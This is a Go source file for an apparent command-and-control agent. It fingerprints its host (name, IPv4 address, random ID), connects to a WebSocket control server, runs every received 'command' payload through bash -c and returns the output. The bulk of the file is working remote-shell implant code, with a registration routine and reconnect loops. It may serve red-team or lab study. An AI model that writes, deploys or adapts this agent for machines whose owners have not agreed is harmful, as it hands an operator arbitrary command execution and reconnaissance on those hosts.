package main

import (
	"encoding/json"
	"fmt"
	"log"
	"math"
	"math/rand"
	"net"
	"net/http"
	"net/url"
	"os"
	"os/exec"
	"strconv"
	"time"

	// "gontrol/src/logger"

	"github.com/gorilla/websocket"
)

// Endpoints of the control server this agent talks to.
const (
	// webServerAddr is the host:port of the server's HTTP API.
	webServerAddr = "127.0.0.1:3333"

	// webSocketAddr is the host:port of the server's WebSocket listener.
	webSocketAddr = "127.0.0.1:5555"

	// registerURL is the HTTP endpoint registerAgent posts its form to.
	registerURL = "http://" + webServerAddr + "/agents"

	// wsURL = "ws://" + webSocketAddr + "/data"
)

// Agent is the JSON shape of an agent record.
//
// NOTE(review): nothing in this file constructs or reads an Agent; it
// presumably mirrors the record kept by the server. Confirm before changing
// any field name or tag.
type Agent struct {
	// AgentName is serialized as "agentName".
	AgentName string `json:"agentName"`
	// AgentID is serialized as "agentId".
	AgentID string `json:"agentId"`
	// AgentType is serialized as "agentType".
	AgentType string `json:"agentType"`
	// AgentIP is serialized as "agentIp".
	AgentIP string `json:"agentIp"`
	// InitialContact is serialized as "initialContact". It is a plain string;
	// the timestamp format is not defined in this file.
	InitialContact string `json:"initialContact"`
	// LastContact is serialized as "lastContact". It is a plain string; the
	// timestamp format is not defined in this file.
	LastContact string `json:"lastContact"`
	// HostName is serialized as "hostName".
	HostName string `json:"hostName"`
}

// Message is the JSON envelope exchanged with the server over the WebSocket.
type Message struct {
	// Type names the kind of message. listenForCommands only acts on
	// "command" and replies with "response".
	Type string `json:"type"`
	// Payload carries the body: the shell command text for a "command", the
	// captured command output for a "response".
	Payload string `json:"payload"`
}

// conn is the package-level WebSocket connection to the server. It is
// assigned by connectToWebSocket and read by listenForCommands; no lock
// guards it in this file.
var conn *websocket.Conn

// registerAgent announces this agent to the server by POSTing a URL-encoded
// form to registerURL.
//
// The form carries the fields agentId, agentName, agentType, IPv4Address
// (taken from agentIp) and addPort. The call succeeds only when the server
// answers 201 Created.
//
// It returns an error when the request cannot be completed (the underlying
// error is wrapped with %w, so errors.Is / errors.As work on it) or when the
// server replies with any other status.
func registerAgent(agentName, agentId, agentIp, agentType, addPort string) error {
	form := url.Values{}
	form.Add("agentId", agentId)
	form.Add("agentName", agentName)
	form.Add("agentType", agentType)
	form.Add("IPv4Address", agentIp)
	form.Add("addPort", addPort)

	// http.PostForm goes through http.DefaultClient, which has no timeout; a
	// dedicated client keeps an unresponsive server from blocking forever.
	client := &http.Client{Timeout: 10 * time.Second}

	resp, err := client.PostForm(registerURL, form)
	if err != nil {
		return fmt.Errorf("Error registering agent: %w", err)
	}
	defer resp.Body.Close()

	if resp.StatusCode != http.StatusCreated {
		return fmt.Errorf("Failed to register agent, status: %v", resp.Status)
	}

	log.Printf("Agent %s successfully registered.", agentName)
	// append(logger.LogEntries, fmt.Sprintf("%s Agent successfully registered.", time.Now().Format(time.RFC3339)))
	return nil
}

// connectToWebSocket dials the server's WebSocket endpoint and stores the
// resulting connection in the package-level conn.
//
// The agent's identity is passed as query parameters (agentName, agentId,
// IPv4Address, agentType, hostname), each query-escaped. A failed dial is
// logged and retried every 5 seconds, without limit, so the function blocks
// until a connection is established and in practice only ever returns nil.
func connectToWebSocket(agentName, agentId, agentIp, agentType, hostName string) error {
	wsURL := fmt.Sprintf(
		"ws://%s/data?agentName=%s&agentId=%s&IPv4Address=%s&agentType=%s&hostname=%s",
		webSocketAddr,
		url.QueryEscape(agentName),
		url.QueryEscape(agentId),
		url.QueryEscape(agentIp),
		url.QueryEscape(agentType),
		url.QueryEscape(hostName),
	)

	for {
		// Dial into a local first: a failed attempt must not overwrite the
		// package-level conn with nil.
		c, _, err := websocket.DefaultDialer.Dial(wsURL, nil)
		if err == nil {
			conn = c
			log.Println("WebSocket connection established")
			// logger.LogEntries = append(logger.LogEntries, fmt.Sprintf("%s websocket established", time.Now().Format(time.RFC3339)))
			return nil
		}

		log.Printf("Failed to connect to WebSocket: %v. Retrying in 5 seconds...", err)
		time.Sleep(5 * time.Second)
	}
}

// reconnectToWebSocket re-establishes the WebSocket connection by calling
// connectToWebSocket until it succeeds.
//
// Between failed attempts it sleeps with exponential backoff, starting at 2
// seconds and doubling up to a cap of 1 minute. It returns nil once a
// connection is established; there is no path that returns a non-nil error.
//
// NOTE(review): connectToWebSocket currently retries internally and never
// returns an error, so the backoff branch below is not reached as the file
// stands.
func reconnectToWebSocket(agentName, agentId, agentIp, agentType, hostName string) error {
	backoff := 2 * time.Second
	maxBackoff := 1 * time.Minute

	for {
		log.Println("Attempting to reconnect to WebSocket...")
		err := connectToWebSocket(agentName, agentId, agentIp, agentType, hostName)
		if err == nil {
			log.Println("Reconnection successful.")
			return nil
		}

		log.Printf("Reconnection failed: %v", err)

		time.Sleep(backoff)
		backoff *= 2
		if backoff > maxBackoff {
			backoff = maxBackoff
		}
	}
}

func listenForCommands(agentName, agentId, agentIp, agentType, hostName string) {
	defer conn.Close()

	for {
		_, rawMessage, err := conn.ReadMessage()
		if err != nil {
			log.Printf("Connection lost: %v", err)
			if reconnectErr := reconnectToWebSocket(agentName, agentId, agentIp, agentType, hostName); reconnectErr != nil {
				log.Printf("Critical error during reconnection: %v", reconnectErr)
				}
			continue
		}

		var message Message
		if err := json.Unmarshal(rawMessage, &message); err != nil {
			log.Printf("Error unmarshalling message: %v", err)
			continue
		}

		if message.Type != "command" {
			log.Printf("Ignoring non-command message: %v", message)
			continue
		}

		command := message.Payload
		log.Printf("Received command: %s", command)

		cmd := exec.Command("bash", "-c", command)
		output, err := cmd.CombinedOutput()

		response := Message{
			Type: "response",
			Payload: string(output),
		}

		if err != nil {
			response.Payload += fmt.Sprintf("\n Error executing command: %v", err)
		}

		responseBytes, _ := json.Marshal(response)
		if err := conn.WriteMessage(websocket.TextMessage, responseBytes); err != nil {
			log.Printf("Error sending output: %v", err)
			break
		}

		log.Printf("Output sent to server.")
	}
}

// randomInt returns a pseudo-random non-negative integer with exactly length
// decimal digits, i.e. a value in [10^(length-1), 10^length - 1].
//
// A length below 1 yields 0. A length too large for int is clamped to the
// largest digit count whose whole range fits (18 on 64-bit platforms, 9 on
// 32-bit), so the function never overflows or panics.
//
// The value comes from math/rand and is NOT suitable for security-sensitive
// identifiers.
func randomInt(length int) int {
	if length < 1 {
		return 0
	}

	// Largest digit count d for which 10^d - 1 still fits in an int.
	const maxInt = int(^uint(0) >> 1)
	maxDigits := int(math.Log10(float64(maxInt)))
	if length > maxDigits {
		length = maxDigits
	}

	lo := int(math.Pow10(length - 1))
	hi := int(math.Pow10(length)) - 1

	// Use a private generator rather than rand.Seed: Seed is deprecated and
	// resets the shared global generator for every other caller.
	rng := rand.New(rand.NewSource(time.Now().UnixNano()))
	return lo + rng.Intn(hi-lo+1)
}

// GetLocalIP returns the first non-loopback IPv4 address reported by
// net.InterfaceAddrs, or nil when no such address exists.
//
// If the interface addresses cannot be listed, the error is passed to
// log.Fatal, which terminates the process.
func GetLocalIP() net.IP {
	addresses, err := net.InterfaceAddrs()
	if err != nil {
		log.Fatal(err)
	}

	for _, addr := range addresses {
		network, isIPNet := addr.(*net.IPNet)
		if !isIPNet || network.IP.IsLoopback() {
			continue
		}
		// To4 returns nil for addresses that are not IPv4.
		if network.IP.To4() == nil {
			continue
		}
		return network.IP
	}
	return nil
}

// GetLocalIPs returns every IPv4 address reported by net.InterfaceAddrs, in
// the order reported. Unlike GetLocalIP it does not filter out loopback
// addresses. The result is a nil slice when there are no IPv4 addresses.
//
// If the interface addresses cannot be listed, the error is passed to
// log.Fatal, which terminates the process.
func GetLocalIPs() []net.IP {
	addresses, err := net.InterfaceAddrs()
	if err != nil {
		log.Fatal(err)
	}

	var v4 []net.IP
	for _, addr := range addresses {
		network, isIPNet := addr.(*net.IPNet)
		// To4 returns nil for addresses that are not IPv4.
		if isIPNet && network.IP.To4() != nil {
			v4 = append(v4, network.IP)
		}
	}
	return v4
}

// main builds the agent's identity (fixed name and type, a random 5-digit ID,
// the local IPv4 address and the host name), connects to the server's
// WebSocket endpoint and then serves commands until listenForCommands returns.
func main() {
	agentName := "Agent-001"
	agentId := strconv.Itoa(randomInt(5))
	agentType := "BaseAgent"

	// GetLocalIP returns nil when no non-loopback IPv4 address exists; calling
	// String on a nil net.IP would report the literal "<nil>" to the server.
	agentIp := ""
	if ip := GetLocalIP(); ip != nil {
		agentIp = ip.String()
	} else {
		log.Println("No non-loopback IPv4 address found; reporting an empty IP")
	}

	// A missing host name is not fatal: log it and continue with the empty
	// string that os.Hostname returns on failure.
	hostName, err := os.Hostname()
	if err != nil {
		log.Printf("Could not determine host name: %v", err)
	}

	log.Printf("AgentId: %s", agentId)

	// NOTE: registerAgent also takes an addPort argument, which this disabled
	// call does not pass.
	// if err := registerAgent(agentName, agentId, agentIp, agentType); err != nil {
	// 	log.Fatalf("Agent registration failed: %v", err)
	// }

	if err := connectToWebSocket(agentName, agentId, agentIp, agentType, hostName); err != nil {
		log.Fatalf("Websocket connection failed: %v", err)
	}

	listenForCommands(agentName, agentId, agentIp, agentType, hostName)
}